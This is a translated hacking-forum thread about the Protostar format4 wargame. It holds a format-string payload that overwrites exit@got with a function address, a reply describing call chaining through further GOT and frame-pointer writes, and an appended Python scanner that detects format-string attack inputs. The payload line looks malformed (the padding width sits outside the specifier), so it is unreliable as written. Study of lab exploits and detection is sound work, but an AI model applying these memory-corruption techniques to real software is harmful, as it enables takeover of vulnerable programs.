System Hacking

   tkakr7458
   format string bug + got overwrite

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=1864


Hmm.. I can't upload pictures, so this is hard to explain ㅠㅠ

https://exploit-exercises.com/protostar/format4/

The address above is the source.

I'm trying to overwrite exit with hello.

hello = 0x080484b4, and
exit@got = 0x8049718.

The format offset is 4. (With "AAAA %x%x%x%x" it shows up in the 4th position.)

(python -c 'print "\x18\x97\x04\x08"+"134513840%x"+"%4$n"')
                   exit@got           hello as an integer - 4

I understand that doing it this way performs the overwrite, but I don't know how to call hello repeatedly. Please help ㅠㅠ

  Hit : 3056     Date : 2017/04/19 08:28



    
해쿨러 The intent of this problem itself is to call hello just once, and since hello contains _exit it will terminate after going to hello anyway, but if it were not there, the way to call it repeatedly is to overwrite the stack.
Overwrite the exit function's GOT with a function that proceeds normally even when it receives the argument 1, for example execve (execve does not terminate the program even if its arguments are wrong),
and then find the pointer to the sfp. That is, since vuln's sfp points to main's sfp, if you overwrite the address at vuln's sfp with %n and then overwrite the payload with the fsb from main's ret onward, you can do call chaining with an fsb as well.
2017/04/20  
해쿨러 http://www.hackerschool.org/Sub_Html/HS_Posting/?uid=38 2017/04/20
tkakr7458 Thank you. ㅠㅠ 2017/04/20
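
A defensive counterpart to the thread, added here as an example and not code from either poster: a Python scanner that flags printf directives in untrusted input before it reaches a logging or formatting call. The thresholds `WIDE` and `MANY_SPECS`, the function names and the sample list are assumptions made for illustration.

```python
import re

# One printf conversion: %[n$][flags][width][.precision][length]conversion
SPEC = re.compile(
    r"%(?:(?P<pos>\d+)\$)?[-+ #0']*(?P<width>\d+|\*)?(?:\.(?:\d+|\*))?"
    r"(?:hh|h|ll|l|L|j|z|t)?(?P<conv>[diouxXeEfFgGaAcspn%])"
)
WIDE = 4096      # assumed threshold: padding this large is unusual in benign text
MANY_SPECS = 3   # assumed threshold: runs of %x are typical stack probing


def scan(data: bytes) -> dict:
    """Count format-string indicators in one untrusted input."""
    found = {"specs": 0, "writes": 0, "positional": 0, "wide": 0}
    # latin-1 maps bytes 1:1, so raw address bytes never raise on decode
    for m in SPEC.finditer(data.decode("latin-1")):
        if m["conv"] == "%":
            continue  # "%%" is a literal percent sign
        found["specs"] += 1
        found["writes"] += m["conv"] == "n"       # %n stores the output count
        found["positional"] += m["pos"] is not None
        width = m["width"]
        found["wide"] += bool(width and width != "*" and int(width) >= WIDE)
    return found


def classify(data: bytes) -> str:
    """Map the indicator counts to a coarse verdict for alerting."""
    f = scan(data)
    if f["writes"]:
        return "write-primitive"
    if f["positional"] or f["wide"] or f["specs"] >= MANY_SPECS:
        return "suspicious"
    return "clean"


# Constructed samples; the last two have the shape of the inputs in the post.
SAMPLES = [
    b"plain text",
    b"progress: 100% done",
    b"AAAA %x%x%x%x",
    b"\x18\x97\x04\x08" + b"134513840%x" + b"%4$n",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(classify(s), scan(s), s)
```

Scanning only detects; the fix in C is to pass input as an argument (`printf("%s", buf)`) and never as the format itself.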